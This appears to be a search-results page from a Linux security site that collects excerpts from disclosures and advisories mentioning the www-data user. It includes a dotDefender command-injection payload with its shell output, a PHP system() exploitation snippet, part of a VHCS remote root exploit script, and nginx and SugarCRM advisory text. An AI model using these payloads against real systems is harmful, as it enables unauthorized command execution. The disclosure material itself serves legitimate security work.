New User, Welcome!     Login

www/data

Remote Command Execution in dotDefender Site Management

../;pwd;&action=deletesite&linenum=15

--------------------/Response/--------------------
[...]
<br>
uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 12
drwxr-xr-x 3 root     root 4096 Nov 23 02:37 .
drwxr-xr-x 9 root     root 4096 Nov 23 02:37 ..
drwxr-xr-x 7 www-data   99 4096 Nov 23 07:11 admin
/usr/local/APPCure-full/lib/admin

Re: [Full-disclosure] Remote Command Execution in dotDefender Site Management

> ../;pwd;&action=deletesite&linenum=15
> 
> --------------------/Response/--------------------
> [...]
> <br>
> uid=33(www-data) gid=33(www-data) groups=33(www-data)
> total 12
> drwxr-xr-x 3 root     root 4096 Nov 23 02:37 .
> drwxr-xr-x 9 root     root 4096 Nov 23 02:37 ..
> drwxr-xr-x 7 www-data   99 4096 Nov 23 07:11 admin
> /usr/local/APPCure-full/lib/admin

Local vulnerability in suexec + FastCGI + PHP configurations

In .htaccess we have:
Action php-fcgi /php.fcgi
AddHandler php-fcgi .php

This is a fairly common set up. It can be exploited as follows (www-data is the username the webserver runs as):

$ whoami
www-data
$ cat >/tmp/exploit.php
<?php system("whoami");

VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit

        var $sleep_time = 4;

        #  -rw-r--r-- 1 root root
        var $conf_path = '/etc/vhcs2/vhcs2.conf';

        # -r-------- 1 www-data www-data
        var $keys_path = '/var/www/vhcs2/gui/include/vhcs2-db-keys.php';

        var $head_arr = array(
            'admin/index.php'       => 3,
            'reseller/index.php'    => 2,

[SECURITY] [DSA 1884-1] New nginx packages fix arbitrary code execution

CVE ID         : CVE-2009-2629

Chris Ries discovered that nginx, a high-performance HTTP server, reverse
proxy and IMAP/POP3 proxy server, is vulnerable to a buffer underflow when
processing certain HTTP requests.  An attacker can use this to execute
arbitrary code with the rights of the worker process (www-data on Debian)
or possibly perform denial of service attacks by repeatedly crashing
worker processes via a specially crafted URL in an HTTP request.


For the oldstable distribution (etch), this problem has been fixed in

SugarCRM Community Edition Local File Disclosure Vulnerability

As a result SugarCRM does not display the new RSS feed in the list as it
 is not a valid RSS URL Feed. However, the application creates a local 
file with the filename of the md5 hash of the URL entered. The file is 
created in the directory cache/feeds . If the Apache web server is used, 
the file is created with the user www-data containing read permission. 


== Exploitation ==

An exploitation example in a LAMP (Linux, Apache, Mysql, PHP)


Copyright © 1995-2012 LinuxRocket.net. All rights reserved.

Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!